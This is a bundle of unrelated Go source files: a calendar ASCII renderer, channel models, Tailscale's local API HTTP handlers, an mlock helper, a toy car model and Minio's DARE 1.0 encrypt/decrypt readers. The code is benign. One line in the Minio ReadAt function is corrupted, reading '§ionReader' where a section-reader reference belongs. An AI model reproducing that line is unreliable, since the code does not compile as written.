}
// CurrentEvents returns the events scheduled for the current day of
// the current season.
func (c *Calendar) CurrentEvents() ([]Event, error) {
	return c.CurrentSeason.GetEvents(c.CurrentDay)
}
// EventsSummary formats events as display lines: a count header
// followed by one "- <event>" bullet per event, with a spacer line
// after each entry.  An empty list yields a single "No events today".
func (c *Calendar) EventsSummary(events []Event) []string {
	total := len(events)
	if total < 1 {
		return []string{"No events today"}
	}
	plural := "s"
	if total == 1 {
		plural = ""
	}
	lines := []string{fmt.Sprintf("%d event%s today:", total, plural), " "}
	for _, event := range events {
		lines = append(lines, fmt.Sprintf("- %s", event), " ")
	}
	return lines
}
// SeasonEmoji returns the emoji associated with the current season.
func (c *Calendar) SeasonEmoji() string {
	return c.CurrentSeason.Emoji()
}
// DaySheet renders the current day as a fixed-size ASCII "page": a
// 40x20 bordered box with the date in a header band and the supplied
// content lines vertically centred below a horizontal rule.
func (c *Calendar) DaySheet(lines ...string) string {
	width := 40
	height := 20
	var sb strings.Builder
	dateStr := fmt.Sprintf("%s %s %d", c.SeasonEmoji(), c.CurrentSeason, c.CurrentDay)
	dateStrRunes := []rune(dateStr)
	leftPadding := 3
	topPadding := 2
	dateLineRow := topPadding
	borderRow := dateLineRow + 2
	totalLines := len(lines)
	// centre the content block between the header rule and the bottom
	numerator := float64((height - borderRow) - (totalLines - 1))
	denominator := float64(2)
	contentStartRow := int(math.Round(numerator / denominator))
	lineIndex := 0
	// NOTE(review): non-winter season emoji appear to render
	// double-width, so the date row suppresses one padding space —
	// inferred from this flag's use below; confirm per-terminal.
	accountForEmojiWidth := c.CurrentSeason.Name != "winter"
	var lineRunes []rune
	for row := 0; row < height; row++ {
		topOrBottomRow := row == 0 || row == height-1
		wroteLine := false
		// pick the next content line, if any remain
		if lineIndex < totalLines {
			lineRunes = []rune(lines[lineIndex])
		} else {
			lineRunes = nil
		}
		for column := 0; column < width; column++ {
			firstColumn := column == 0
			lastColumn := column == width-1
			firstOrLastColumn := firstColumn || lastColumn
			// corners, horizontal and vertical borders
			if topOrBottomRow && firstOrLastColumn {
				sb.WriteString("#")
			} else {
				if topOrBottomRow {
					sb.WriteString("-")
				}
				if firstOrLastColumn {
					sb.WriteString("|")
				}
			}
			contentIndex := column - leftPadding
			if row == dateLineRow && contentIndex >= 0 && contentIndex < len(dateStrRunes) {
				// date header characters
				sb.WriteString(string(dateStrRunes[contentIndex]))
			} else if row >= contentStartRow && contentIndex >= 0 && lineRunes != nil && contentIndex < len(lineRunes) {
				// body content characters
				sb.WriteString(string(lineRunes[contentIndex]))
				wroteLine = true
			} else if row == borderRow && column > 0 && column < width-1 {
				// horizontal rule separating the header from the body
				sb.WriteString("-")
			} else if !topOrBottomRow && !firstOrLastColumn && (!accountForEmojiWidth || row != dateLineRow || contentIndex > len(dateStrRunes) || contentIndex < 0) {
				// interior filler space (skipping one cell on the date
				// row when the emoji is wide)
				sb.WriteString(" ")
			}
			if lastColumn {
				// end of row: advance to next content line if one was used
				if wroteLine {
					lineIndex++
					wroteLine = false
				}
				sb.WriteString("\n")
			}
		}
	}
	return sb.String()
}
// String implements fmt.Stringer as "<season> day <n>".
func (c *Calendar) String() string {
	return fmt.Sprintf("%s day %d", c.CurrentSeason, c.CurrentDay)
}
// loadCalendar reads and decodes the calendar JSON file.
func loadCalendar(pathToCalendar string) (*Calendar, error) {
	bytes, err := ioutil.ReadFile(pathToCalendar)
	if err != nil {
		return nil, err
	}
	var calendar Calendar
	// The decode error was previously discarded, silently yielding an
	// empty calendar for malformed input.
	if err := json.Unmarshal(bytes, &calendar); err != nil {
		return nil, err
	}
	return &calendar, nil
}
// getNextSeason returns the season following season in the
// spring -> summer -> fall -> winter -> spring cycle, located by name
// in seasons.
func getNextSeason(season *Season, seasons []*Season) (*Season, error) {
	var lookingFor string
	switch season.Name {
	case "spring":
		lookingFor = "summer"
	case "summer":
		lookingFor = "fall"
	case "fall":
		lookingFor = "winter"
	case "winter":
		lookingFor = "spring"
	default:
		return nil, fmt.Errorf("Don't know next season after '%s'", season.Name)
	}
	for _, s := range seasons {
		if s.Name == lookingFor {
			return s, nil
		}
	}
	return nil, fmt.Errorf("Could not find season '%s'", lookingFor)
}
// getPreviousSeason returns the season preceding season in the
// spring -> summer -> fall -> winter cycle, located by name in
// seasons.
func getPreviousSeason(season *Season, seasons []*Season) (*Season, error) {
	var lookingFor string
	switch season.Name {
	case "spring":
		lookingFor = "winter"
	case "summer":
		lookingFor = "spring"
	case "fall":
		lookingFor = "summer"
	case "winter":
		lookingFor = "fall"
	default:
		// the old message said "next season before", a copy/paste slip
		// from getNextSeason
		return nil, fmt.Errorf("Don't know previous season before '%s'", season.Name)
	}
	for _, s := range seasons {
		if s.Name == lookingFor {
			return s, nil
		}
	}
	return nil, fmt.Errorf("Could not find season '%s'", lookingFor)
}
|
package models
// Media holds the image asset paths associated with a channel.
type Media struct {
	LogoImagePath          string `json:"logo_image_path"`
	ChannelBannerImagePath string `json:"channel_banner_image_path"`
}

// ChannelModel is the JSON representation of a single channel and its
// aggregate statistics.
type ChannelModel struct {
	ChannelID               int    `json:"channel_id"`
	ChannelName             string `json:"channel_name"`
	ChannelRank             int    `json:"channel_rank"`
	ChannelSubscribersCount int    `json:"channel_subscribers_count"`
	ChannelViewsCount       int    `json:"channel_views_count"`
	ChannelVideosCount      int    `json:"channel_videos_count"`
	Media                   Media  `json:"media"`
}

// ChannelsModel wraps a list of channels for JSON responses.
type ChannelsModel struct {
	Channels []ChannelModel `json:"channels"`
}
|
// Copyright (c) 2021 Tailscale Inc & AUTHORS All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package localapi contains the HTTP server handlers for tailscaled's API server.
package localapi
import (
"crypto/rand"
"encoding/hex"
"encoding/json"
"errors"
"fmt"
"io"
"net"
"net/http"
"net/http/httputil"
"net/url"
"reflect"
"runtime"
"strconv"
"strings"
"sync"
"time"
"inet.af/netaddr"
"tailscale.com/client/tailscale/apitype"
"tailscale.com/ipn"
"tailscale.com/ipn/ipnlocal"
"tailscale.com/ipn/ipnstate"
"tailscale.com/net/netknob"
"tailscale.com/tailcfg"
"tailscale.com/types/logger"
"tailscale.com/version"
)
// randHex returns a hex-encoded string of n cryptographically random
// bytes (so the returned string is 2*n characters long).
func randHex(n int) string {
	b := make([]byte, n)
	if _, err := rand.Read(b); err != nil {
		// The original ignored this error; on the (unrecoverable) failure
		// of the system randomness source it would have returned a
		// hex-encoding of all-zero bytes. Crash loudly instead.
		panic(err)
	}
	return hex.EncodeToString(b)
}
// NewHandler returns a localapi Handler that serves requests against the
// backend b and logs through logf. logID is the backend's log ID, used
// to tag bug-report markers. Read/write permissions and the required
// password are left at their zero values; callers set them on the
// returned Handler.
func NewHandler(b *ipnlocal.LocalBackend, logf logger.Logf, logID string) *Handler {
	return &Handler{b: b, logf: logf, backendLogID: logID}
}
// Handler is the HTTP handler for tailscaled's local API server.
type Handler struct {
	// RequiredPassword, if non-empty, forces all HTTP
	// requests to have HTTP basic auth with this password.
	// It's used by the sandboxed macOS sameuserproof GUI auth mechanism.
	RequiredPassword string

	// PermitRead is whether read-only HTTP handlers are allowed.
	PermitRead bool

	// PermitWrite is whether mutating HTTP handlers are allowed.
	PermitWrite bool

	b            *ipnlocal.LocalBackend // backend all handlers operate on; must be non-nil to serve
	logf         logger.Logf            // logging destination
	backendLogID string                 // backend's log ID; embedded in bug-report markers
}
// ServeHTTP dispatches local API requests: it verifies the backend is
// present, advertises the daemon version, enforces optional basic-auth,
// then routes by URL path (prefix routes first, then exact matches).
func (h *Handler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	if h.b == nil {
		http.Error(w, "server has no local backend", http.StatusInternalServerError)
		return
	}
	w.Header().Set("Tailscale-Version", version.Long)
	if h.RequiredPassword != "" {
		_, pass, ok := r.BasicAuth()
		switch {
		case !ok:
			http.Error(w, "auth required", http.StatusUnauthorized)
			return
		case pass != h.RequiredPassword:
			http.Error(w, "bad password", http.StatusForbidden)
			return
		}
	}
	path := r.URL.Path
	switch {
	case strings.HasPrefix(path, "/localapi/v0/files/"):
		h.serveFiles(w, r)
		return
	case strings.HasPrefix(path, "/localapi/v0/file-put/"):
		h.serveFilePut(w, r)
		return
	case strings.HasPrefix(path, "/localapi/v0/cert/"):
		h.serveCert(w, r)
		return
	}
	switch path {
	case "/localapi/v0/whois":
		h.serveWhoIs(w, r)
	case "/localapi/v0/goroutines":
		h.serveGoroutines(w, r)
	case "/localapi/v0/profile":
		h.serveProfile(w, r)
	case "/localapi/v0/status":
		h.serveStatus(w, r)
	case "/localapi/v0/logout":
		h.serveLogout(w, r)
	case "/localapi/v0/prefs":
		h.servePrefs(w, r)
	case "/localapi/v0/check-ip-forwarding":
		h.serveCheckIPForwarding(w, r)
	case "/localapi/v0/bugreport":
		h.serveBugReport(w, r)
	case "/localapi/v0/file-targets":
		h.serveFileTargets(w, r)
	case "/localapi/v0/set-dns":
		h.serveSetDNS(w, r)
	case "/localapi/v0/derpmap":
		h.serveDERPMap(w, r)
	case "/":
		io.WriteString(w, "tailscaled\n")
	default:
		http.Error(w, "404 not found", 404)
	}
}
// serveBugReport logs a unique "BUG-..." marker (backend log ID,
// UTC timestamp, random suffix), logs an optional user-supplied note,
// and echoes the marker back to the client as plain text.
func (h *Handler) serveBugReport(w http.ResponseWriter, r *http.Request) {
	if !h.PermitRead {
		http.Error(w, "bugreport access denied", http.StatusForbidden)
		return
	}
	stamp := time.Now().UTC().Format("20060102150405Z")
	marker := fmt.Sprintf("BUG-%v-%v-%v", h.backendLogID, stamp, randHex(8))
	h.logf("user bugreport: %s", marker)
	note := r.FormValue("note")
	if len(note) > 0 {
		h.logf("user bugreport note: %s", note)
	}
	w.Header().Set("Content-Type", "text/plain")
	fmt.Fprintln(w, marker)
}
// serveWhoIs resolves the required "addr" form value (an ip:port) to the
// owning node and user profile, and writes the result as indented JSON.
func (h *Handler) serveWhoIs(w http.ResponseWriter, r *http.Request) {
	if !h.PermitRead {
		http.Error(w, "whois access denied", http.StatusForbidden)
		return
	}
	addr := r.FormValue("addr")
	if addr == "" {
		http.Error(w, "missing 'addr' parameter", 400)
		return
	}
	ipp, err := netaddr.ParseIPPort(addr)
	if err != nil {
		http.Error(w, "invalid 'addr' parameter", 400)
		return
	}
	node, profile, ok := h.b.WhoIs(ipp)
	if !ok {
		http.Error(w, "no match for IP:port", 404)
		return
	}
	res := &apitype.WhoIsResponse{
		Node:        node,
		UserProfile: &profile,
	}
	body, err := json.MarshalIndent(res, "", "\t")
	if err != nil {
		http.Error(w, "JSON encoding error", 500)
		return
	}
	w.Header().Set("Content-Type", "application/json")
	w.Write(body)
}
// serveGoroutines dumps all goroutine stacks as plain text.
func (h *Handler) serveGoroutines(w http.ResponseWriter, r *http.Request) {
	// Require write access out of paranoia that the goroutine dump
	// (at least its arguments) might contain something sensitive.
	if !h.PermitWrite {
		http.Error(w, "goroutine dump access denied", http.StatusForbidden)
		return
	}
	stack := make([]byte, 2<<20)
	stackLen := runtime.Stack(stack, true)
	w.Header().Set("Content-Type", "text/plain")
	w.Write(stack[:stackLen])
}
// serveProfileFunc is the implementation of Handler.serveProfile, after auth,
// for platforms where we want to link it in. It stays nil where the pprof
// support isn't linked in; serveProfile checks for nil before calling it.
var serveProfileFunc func(http.ResponseWriter, *http.Request)
// serveProfile serves a runtime profile through the platform-specific
// serveProfileFunc hook, when one is linked in.
func (h *Handler) serveProfile(w http.ResponseWriter, r *http.Request) {
	// Require write access out of paranoia that the profile dump
	// might contain something sensitive.
	if !h.PermitWrite {
		http.Error(w, "profile access denied", http.StatusForbidden)
		return
	}
	serve := serveProfileFunc
	if serve == nil {
		http.Error(w, "not implemented on this platform", http.StatusServiceUnavailable)
		return
	}
	serve(w, r)
}
// serveCheckIPForwarding runs the backend's IP-forwarding check and
// responds with a JSON object whose Warning field is the error text, or
// empty when the check passes.
func (h *Handler) serveCheckIPForwarding(w http.ResponseWriter, r *http.Request) {
	if !h.PermitRead {
		http.Error(w, "IP forwarding check access denied", http.StatusForbidden)
		return
	}
	warning := ""
	if err := h.b.CheckIPForwarding(); err != nil {
		warning = err.Error()
	}
	w.Header().Set("Content-Type", "application/json")
	json.NewEncoder(w).Encode(struct {
		Warning string
	}{Warning: warning})
}
// serveStatus writes the backend status as indented JSON. Peers are
// included unless the "peers" form value parses as false.
func (h *Handler) serveStatus(w http.ResponseWriter, r *http.Request) {
	if !h.PermitRead {
		http.Error(w, "status access denied", http.StatusForbidden)
		return
	}
	w.Header().Set("Content-Type", "application/json")
	var st *ipnstate.Status
	if withPeers := defBool(r.FormValue("peers"), true); withPeers {
		st = h.b.Status()
	} else {
		st = h.b.StatusWithoutPeers()
	}
	enc := json.NewEncoder(w)
	enc.SetIndent("", "\t")
	enc.Encode(st)
}
// serveLogout logs the node out synchronously. POST-only; requires
// write permission; responds 204 No Content on success.
func (h *Handler) serveLogout(w http.ResponseWriter, r *http.Request) {
	if !h.PermitWrite {
		http.Error(w, "logout access denied", http.StatusForbidden)
		return
	}
	if r.Method != "POST" {
		http.Error(w, "want POST", 400)
		return
	}
	if err := h.b.LogoutSync(r.Context()); err != nil {
		http.Error(w, err.Error(), 500)
		return
	}
	w.WriteHeader(http.StatusNoContent)
}
// servePrefs reads (GET/HEAD) or patches (PATCH, write permission
// required) the backend preferences, responding with the resulting
// prefs as indented JSON.
func (h *Handler) servePrefs(w http.ResponseWriter, r *http.Request) {
	if !h.PermitRead {
		http.Error(w, "prefs access denied", http.StatusForbidden)
		return
	}
	var prefs *ipn.Prefs
	switch r.Method {
	case "PATCH":
		if !h.PermitWrite {
			http.Error(w, "prefs write access denied", http.StatusForbidden)
			return
		}
		masked := new(ipn.MaskedPrefs)
		if err := json.NewDecoder(r.Body).Decode(masked); err != nil {
			http.Error(w, err.Error(), 400)
			return
		}
		updated, err := h.b.EditPrefs(masked)
		if err != nil {
			http.Error(w, err.Error(), 400)
			return
		}
		prefs = updated
	case "GET", "HEAD":
		prefs = h.b.Prefs()
	default:
		http.Error(w, "unsupported method", http.StatusMethodNotAllowed)
		return
	}
	w.Header().Set("Content-Type", "application/json")
	enc := json.NewEncoder(w)
	enc.SetIndent("", "\t")
	enc.Encode(prefs)
}
// serveFiles handles /localapi/v0/files/. With an empty suffix it lists
// waiting files (GET only); with a filename suffix it deletes (DELETE)
// or streams (any other method) that waiting file.
func (h *Handler) serveFiles(w http.ResponseWriter, r *http.Request) {
	if !h.PermitWrite {
		http.Error(w, "file access denied", http.StatusForbidden)
		return
	}
	suffix := strings.TrimPrefix(r.URL.EscapedPath(), "/localapi/v0/files/")
	if suffix == "" {
		// No filename given: list the files waiting to be fetched.
		if r.Method != "GET" {
			http.Error(w, "want GET to list files", 400)
			return
		}
		files, err := h.b.WaitingFiles()
		if err != nil {
			http.Error(w, err.Error(), 500)
			return
		}
		w.Header().Set("Content-Type", "application/json")
		json.NewEncoder(w).Encode(files)
		return
	}
	name, err := url.PathUnescape(suffix)
	if err != nil {
		http.Error(w, "bad filename", 400)
		return
	}
	if r.Method == "DELETE" {
		if err := h.b.DeleteFile(name); err != nil {
			http.Error(w, err.Error(), 500)
			return
		}
		w.WriteHeader(http.StatusNoContent)
		return
	}
	reader, size, err := h.b.OpenFile(name)
	if err != nil {
		http.Error(w, err.Error(), 500)
		return
	}
	defer reader.Close()
	w.Header().Set("Content-Length", fmt.Sprint(size))
	io.Copy(w, reader)
}
// writeErrorJSON replies with HTTP 500 and a JSON body of the form
// {"error": "..."} describing err. A nil err is reported as an
// "unexpected nil error" instead of panicking.
func writeErrorJSON(w http.ResponseWriter, err error) {
	if err == nil {
		err = errors.New("unexpected nil error")
	}
	type errorResponse struct {
		Error string `json:"error"`
	}
	w.Header().Set("Content-Type", "application/json")
	w.WriteHeader(500)
	json.NewEncoder(w).Encode(errorResponse{Error: err.Error()})
}
// serveFileTargets lists the peers files can be sent to, as a JSON
// array (never null, thanks to makeNonNil).
func (h *Handler) serveFileTargets(w http.ResponseWriter, r *http.Request) {
	if !h.PermitRead {
		http.Error(w, "access denied", http.StatusForbidden)
		return
	}
	if r.Method != "GET" {
		http.Error(w, "want GET to list targets", 400)
		return
	}
	targets, err := h.b.FileTargets()
	if err != nil {
		writeErrorJSON(w, err)
		return
	}
	makeNonNil(&targets)
	w.Header().Set("Content-Type", "application/json")
	json.NewEncoder(w).Encode(targets)
}
// serveFilePut proxies a file PUT to the peer named in the URL:
// /localapi/v0/file-put/<stableNodeID>/<escaped filename>. The request
// body is streamed to the peer's /v0/put endpoint over the peer-dial
// transport.
func (h *Handler) serveFilePut(w http.ResponseWriter, r *http.Request) {
	if !h.PermitWrite {
		http.Error(w, "file access denied", http.StatusForbidden)
		return
	}
	if r.Method != "PUT" {
		http.Error(w, "want PUT to put file", 400)
		return
	}
	targets, err := h.b.FileTargets()
	if err != nil {
		http.Error(w, err.Error(), 500)
		return
	}
	trimmed := strings.TrimPrefix(r.URL.EscapedPath(), "/localapi/v0/file-put/")
	slash := strings.IndexByte(trimmed, '/')
	if slash == -1 {
		http.Error(w, "bogus URL", 400)
		return
	}
	stableID := tailcfg.StableNodeID(trimmed[:slash])
	filenameEscaped := trimmed[slash+1:]
	var target *apitype.FileTarget
	for _, t := range targets {
		if t.Node.StableID == stableID {
			target = t
			break
		}
	}
	if target == nil {
		http.Error(w, "node not found", 404)
		return
	}
	dstURL, err := url.Parse(target.PeerAPIURL)
	if err != nil {
		http.Error(w, "bogus peer URL", 500)
		return
	}
	outReq, err := http.NewRequestWithContext(r.Context(), "PUT", "http://peer/v0/put/"+filenameEscaped, r.Body)
	if err != nil {
		http.Error(w, "bogus outreq", 500)
		return
	}
	outReq.ContentLength = r.ContentLength
	proxy := httputil.NewSingleHostReverseProxy(dstURL)
	proxy.Transport = getDialPeerTransport(h.b)
	proxy.ServeHTTP(w, outReq)
}
// serveSetDNS sets a DNS record ("name" → "value" form values) through
// the backend. POST-only; requires write permission. Replies with an
// empty JSON object on success.
func (h *Handler) serveSetDNS(w http.ResponseWriter, r *http.Request) {
	if !h.PermitWrite {
		http.Error(w, "access denied", http.StatusForbidden)
		return
	}
	if r.Method != "POST" {
		http.Error(w, "want POST", 400)
		return
	}
	if err := h.b.SetDNS(r.Context(), r.FormValue("name"), r.FormValue("value")); err != nil {
		writeErrorJSON(w, err)
		return
	}
	w.Header().Set("Content-Type", "application/json")
	json.NewEncoder(w).Encode(struct{}{})
}
// serveDERPMap writes the backend's current DERP map as indented JSON.
// GET only.
func (h *Handler) serveDERPMap(w http.ResponseWriter, r *http.Request) {
	if r.Method != "GET" {
		http.Error(w, "want GET", 400)
		return
	}
	w.Header().Set("Content-Type", "application/json")
	enc := json.NewEncoder(w)
	enc.SetIndent("", "\t")
	enc.Encode(h.b.DERPMap())
}
// dialPeerTransportOnce guards the lazy construction of the process-wide
// peer-dial *http.Transport; v is set exactly once by
// getDialPeerTransport.
var dialPeerTransportOnce struct {
	sync.Once
	v *http.Transport
}
// getDialPeerTransport returns the lazily-created singleton
// http.Transport used to proxy requests to peers. It clones the default
// transport but dials with the backend's peer dial control function and
// the platform TCP keep-alive.
func getDialPeerTransport(b *ipnlocal.LocalBackend) *http.Transport {
	dialPeerTransportOnce.Do(func() {
		tr := http.DefaultTransport.(*http.Transport).Clone()
		tr.Dial = nil // only DialContext below should be used
		d := net.Dialer{
			Timeout:   30 * time.Second,
			KeepAlive: netknob.PlatformTCPKeepAlive(),
			Control:   b.PeerDialControlFunc(),
		}
		tr.DialContext = d.DialContext
		dialPeerTransportOnce.v = tr
	})
	return dialPeerTransportOnce.v
}
// defBool parses a as a boolean, returning def when a is empty or
// unparseable.
func defBool(a string, def bool) bool {
	if a == "" {
		return def
	}
	if v, err := strconv.ParseBool(a); err == nil {
		return v
	}
	return def
}
// makeNonNil takes a pointer to a Go data structure
// (currently only a slice or a map) and makes sure it's non-nil for
// JSON serialization. (In particular, JavaScript clients usually want
// the field to be defined after they decode the JSON.)
//
// It panics if ptr is nil, not a pointer, or a nil pointer; it's a
// no-op when the pointed-to value is already non-nil.
func makeNonNil(ptr interface{}) {
	if ptr == nil {
		panic("nil interface")
	}
	rv := reflect.ValueOf(ptr)
	if rv.Kind() != reflect.Ptr {
		panic(fmt.Sprintf("kind %v, not Ptr", rv.Kind()))
	}
	if rv.Pointer() == 0 {
		panic("nil pointer")
	}
	elem := rv.Elem()
	if elem.Pointer() != 0 {
		return // already non-nil; nothing to do
	}
	switch elem.Type().Kind() {
	case reflect.Slice:
		elem.Set(reflect.MakeSlice(elem.Type(), 0, 0))
	case reflect.Map:
		elem.Set(reflect.MakeMap(elem.Type()))
	}
}
|
// Copyright 2018 High Fidelity, Inc.
//
// Distributed under the Apache License, Version 2.0.
// See the accompanying file LICENSE or http://www.apache.org/licenses/LICENSE-2.0.html
package key
import "syscall"
// mlock locks data's memory pages into RAM via the mlock(2) syscall,
// preventing the kernel from paging them out (e.g. to swap) — used so
// sensitive material stays out of persistent storage.
func mlock(data []byte) error {
	return syscall.Mlock(data)
}
|
package car
import "fmt"
// BMWModel is a concrete car model. It embeds CarModel (declared
// elsewhere in this package) and provides BMW-specific Start/Stop/Alarm
// output.
type BMWModel struct {
	CarModel
}

// Start prints the BMW start message.
func (h BMWModel) Start() {
	fmt.Println("BMW start")
}

// Stop prints the BMW stop message.
func (h BMWModel) Stop() {
	fmt.Println("BMW Stop")
}

// Alarm prints the BMW alarm message.
func (h BMWModel) Alarm() {
	fmt.Println("BMW Alarm")
}
|
// Copyright (C) 2017 Minio Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package sio
import (
"errors"
"io"
)
// encReaderV10 is an io.Reader that encrypts everything it reads from
// src as DARE 1.0 packages (see encryptReaderV10).
type encReaderV10 struct {
	authEncV10
	src io.Reader

	buffer      packageV10 // scratch package storage, taken from packageBufferPool
	offset      int        // read offset into buffer; >0 means buffered ciphertext remains
	payloadSize int        // plaintext bytes per package (from Config.PayloadSize)
	stateErr    error      // sticky error; once set, every Read returns it
}
// encryptReaderV10 returns an io.Reader wrapping the given io.Reader.
// The returned io.Reader encrypts everything it reads using DARE 1.0.
func encryptReaderV10(src io.Reader, config *Config) (*encReaderV10, error) {
	ae, err := newAuthEncV10(config)
	if err != nil {
		return nil, err
	}
	return &encReaderV10{
		authEncV10: ae,
		src:        src,
		// Scratch buffer comes from a shared pool; Read's error paths
		// call recycle() to return it.
		buffer:      packageBufferPool.Get().([]byte)[:maxPackageSize],
		payloadSize: config.PayloadSize,
	}, nil
}
// recycle returns the scratch buffer to packageBufferPool and clears
// the reference so the buffer cannot be used after being recycled.
func (r *encReaderV10) recycle() {
	recyclePackageBufferPool(r.buffer)
	r.buffer = nil
}
// Read implements io.Reader. It reads plaintext from r.src and writes
// sealed DARE packages (header + ciphertext + tag) into p. Packages are
// sealed directly into p while a whole package fits; a final partial
// package is sealed into r.buffer and drained across subsequent calls.
// Any source error becomes sticky via r.stateErr.
func (r *encReaderV10) Read(p []byte) (int, error) {
	if r.stateErr != nil {
		return 0, r.stateErr
	}
	var n int
	if r.offset > 0 { // write the buffered package to p
		remaining := r.buffer.Length() - r.offset // remaining encrypted bytes
		if len(p) < remaining {
			// p can't hold the whole remainder; hand out what fits.
			n = copy(p, r.buffer[r.offset:r.offset+len(p)])
			r.offset += n
			return n, nil
		}
		n = copy(p, r.buffer[r.offset:r.offset+remaining])
		p = p[remaining:]
		r.offset = 0
	}
	// Fast path: while p can hold an entire package, seal in place.
	for len(p) >= headerSize+r.payloadSize+tagSize {
		nn, err := io.ReadFull(r.src, p[headerSize:headerSize+r.payloadSize]) // read plaintext from src
		if err != nil && err != io.ErrUnexpectedEOF {
			r.recycle()
			r.stateErr = err
			return n, err // return if reading from src fails or reached EOF
		}
		r.Seal(p, p[headerSize:headerSize+nn])
		n += headerSize + nn + tagSize
		p = p[headerSize+nn+tagSize:]
	}
	// Tail: seal one more package into the internal buffer and copy as
	// much as fits into p; the rest is served by the next Read.
	if len(p) > 0 {
		nn, err := io.ReadFull(r.src, r.buffer[headerSize:headerSize+r.payloadSize]) // read plaintext from src
		if err != nil && err != io.ErrUnexpectedEOF {
			r.stateErr = err
			r.recycle()
			return n, err // return if reading from src fails or reached EOF
		}
		r.Seal(r.buffer, r.buffer[headerSize:headerSize+nn])
		if length := r.buffer.Length(); length < len(p) {
			r.offset = copy(p, r.buffer[:length])
		} else {
			r.offset = copy(p, r.buffer[:len(p)])
		}
		n += r.offset
	}
	return n, nil
}
// decReaderV10 is an io.Reader that decrypts DARE 1.0 packages read
// from src (see decryptReaderV10).
type decReaderV10 struct {
	authDecV10
	src io.Reader

	buffer   packageV10 // scratch package storage, taken from packageBufferPool
	offset   int        // read offset into the buffered plaintext payload; >0 means plaintext remains
	stateErr error      // sticky error; once set, every Read returns it
}
// decryptReaderV10 returns an io.Reader wrapping the given io.Reader.
// The returned io.Reader decrypts everything it reads using DARE 1.0.
func decryptReaderV10(src io.Reader, config *Config) (*decReaderV10, error) {
	ad, err := newAuthDecV10(config)
	if err != nil {
		return nil, err
	}
	return &decReaderV10{
		authDecV10: ad,
		src:        src,
		// Scratch buffer comes from a shared pool; Read's error paths
		// call recycle() to return it.
		buffer: packageBufferPool.Get().([]byte)[:maxPackageSize],
	}, nil
}
// recycle returns the scratch buffer to packageBufferPool and clears
// the reference so the buffer cannot be used after being recycled.
func (r *decReaderV10) recycle() {
	recyclePackageBufferPool(r.buffer)
	r.buffer = nil
}
// Read implements io.Reader. It reads whole DARE packages from r.src,
// authenticates and decrypts them, and writes the plaintext into p.
// Whole payloads are decrypted directly into p while they fit; a final
// package's payload is decrypted into r.buffer and drained across
// subsequent calls. Any read or authentication error becomes sticky via
// r.stateErr and recycles the buffer.
func (r *decReaderV10) Read(p []byte) (n int, err error) {
	if r.stateErr != nil {
		return 0, r.stateErr
	}
	if r.offset > 0 { // write the buffered plaintext to p
		payload := r.buffer.Payload()
		remaining := len(payload) - r.offset // remaining plaintext bytes
		if len(p) < remaining {
			// p can't hold the whole remainder; hand out what fits.
			n = copy(p, payload[r.offset:+r.offset+len(p)])
			r.offset += n
			return
		}
		n = copy(p, payload[r.offset:r.offset+remaining])
		p = p[remaining:]
		r.offset = 0
	}
	// Fast path: while p can hold a full payload, decrypt directly into p.
	for len(p) >= maxPayloadSize {
		if err = r.readPackage(r.buffer); err != nil {
			r.stateErr = err
			r.recycle()
			return n, err
		}
		length := len(r.buffer.Payload())
		if err = r.Open(p[:length], r.buffer[:r.buffer.Length()]); err != nil { // notice: buffer.Length() may be smaller than len(buffer)
			r.stateErr = err
			r.recycle()
			return n, err // decryption failed
		}
		p = p[length:]
		n += length
	}
	// Tail: decrypt one more package into the internal buffer and copy
	// as much as fits; the remainder is served by the next Read.
	if len(p) > 0 {
		if err = r.readPackage(r.buffer); err != nil {
			r.stateErr = err
			r.recycle()
			return n, err
		}
		payload := r.buffer.Payload()
		if err = r.Open(payload, r.buffer[:r.buffer.Length()]); err != nil { // notice: buffer.Length() may be smaller than len(buffer)
			r.stateErr = err
			r.recycle()
			return n, err // decryption failed
		}
		if len(payload) < len(p) {
			r.offset = copy(p, payload)
		} else {
			r.offset = copy(p, payload[:len(p)])
		}
		n += r.offset
	}
	return n, nil
}
// readPackage reads one complete package (header, then the amount of
// ciphertext the header announces) from r.src into dst. Truncation of
// either part is reported as errInvalidPayloadSize; a clean EOF before
// the header is passed through as io.EOF.
func (r *decReaderV10) readPackage(dst packageV10) error {
	header := dst.Header()
	_, err := io.ReadFull(r.src, header)
	if err == io.ErrUnexpectedEOF {
		return errInvalidPayloadSize // partial header
	}
	if err != nil {
		return err // reading from src failed or reached EOF
	}
	_, err = io.ReadFull(r.src, dst.Ciphertext())
	if err == io.EOF || err == io.ErrUnexpectedEOF {
		return errInvalidPayloadSize // reading less data than specified by header
	}
	if err != nil {
		return err // reading from src failed or reached EOF
	}
	return nil
}
// decReaderAtV10 provides random-access decryption (io.ReaderAt) over a
// DARE 1.0 encrypted source (see decryptReaderAtV10).
type decReaderAtV10 struct {
	src io.ReaderAt // the encrypted source
	ad  authDecV10  // decryption state template, copied per ReadAt call
}
// decryptReaderAtV10 returns an io.ReaderAt wrapping the given io.ReaderAt.
// The returned io.ReaderAt decrypts everything it reads using DARE 1.0.
func decryptReaderAtV10(src io.ReaderAt, config *Config) (*decReaderAtV10, error) {
	ad, err := newAuthDecV10(config)
	if err != nil {
		return nil, err
	}
	r := &decReaderAtV10{
		ad:  ad,
		src: src,
	}
	return r, nil
}
func (r *decReaderAtV10) ReadAt(p []byte, offset int64) (n int, err error) {
if offset < 0 {
return 0, errors.New("sio: DecReaderAt.ReadAt: offset is negative")
}
t := offset / int64(maxPayloadSize)
if t+1 > (1<<32)-1 {
return 0, errUnexpectedSize
}
buffer := packageBufferPool.Get().([]byte)[:maxPackageSize]
defer recyclePackageBufferPool(buffer)
decReader := decReaderV10{
authDecV10: r.ad,
src: §ionReader{r.src, t * maxPackageSize},
buffer: packageV10(buffer),
offset: 0,
}
decReader.SeqNum = uint32(t)
if k := offset % int64(maxPayloadSize); k > 0 {
if _, err := io.CopyN(io.Discard, &decReader, k); err != nil {
return 0, err
}
}
for n < len(p) && err == nil {
var nn int
nn, err = (&decReader).Read(p[n:])
n += nn
}
if err == io.EOF && n == len(p) {
err = nil
}
return n, err
}
|
// Copyright 2017 The Cockroach Authors.
//
